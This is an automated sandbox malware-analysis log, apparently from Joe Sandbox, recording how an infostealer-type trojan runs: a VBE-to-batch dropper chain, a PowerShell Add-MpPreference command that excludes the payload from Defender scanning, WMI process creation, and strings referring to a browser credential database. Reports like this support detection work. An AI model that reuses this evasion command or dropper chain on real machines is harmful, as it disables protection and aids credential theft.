                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7DED0D14_2_00007FFD9B7DED0D
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B7DECD114_2_00007FFD9B7DECD1
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B78F24314_2_00007FFD9B78F243
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B780DA714_2_00007FFD9B780DA7
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9B93028A14_2_00007FFD9B93028A
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 14_2_00007FFD9BCF637714_2_00007FFD9BCF6377
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 15_2_00007FFD9B770DA715_2_00007FFD9B770DA7
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeCode function: 19_2_00007FFD9B790DA719_2_00007FFD9B790DA7
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\GYwcCMoE.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E4EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E4F5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E4EC50 appears 56 times
                                  Source: QRPSxHgy.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: ZlAIxOci.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: aEtIhTbg.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: YuXIhBvf.log.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: file.exe, 00000000.00000003.1647603635.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs file.exe
                                  Source: file.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs file.exe
                                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: chainportruntimeCrtMonitor.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: kahKUDRlEYHfKIalWlM.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: QRPSxHgy.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: HnGdNOQQ.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: ZlAIxOci.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: vCAeICGo.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: aEtIhTbg.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: YuXIhBvf.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.32e89a8.13.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.32c8378.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.31996c0.20.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.2cc62a0.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@25/44@0/2
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E36C74 GetLastError,FormatMessageW,0_2_00E36C74
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00E4A6C2
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\Desktop\ZlAIxOci.logJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeMutant created: \Sessions\1\BaseNamedObjects\Local\6debd4f4d7d9d55a90240b8cfae44a84a1758f30aa4344dbcd056f725fb9cbca
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
                                  Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_00E4DF1E
                                  Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_00E4DF1E
                                  Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_00E4DF1E
                                  Source: C:\Users\user\Desktop\file.exeCommand line argument: xz0_2_00E4DF1E
                                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: E6dmBVnjFo.14.dr, Kqq2Zyhu2W.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: file.exeReversingLabs: Detection: 55%
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\MsContainer\chainportruntimeCrtMonitor.exe "C:\MsContainer/chainportruntimeCrtMonitor.exe"Jump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'Jump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe "C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: version.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\MsContainer\chainportruntimeCrtMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeSection loaded: version.dllJump to behavior
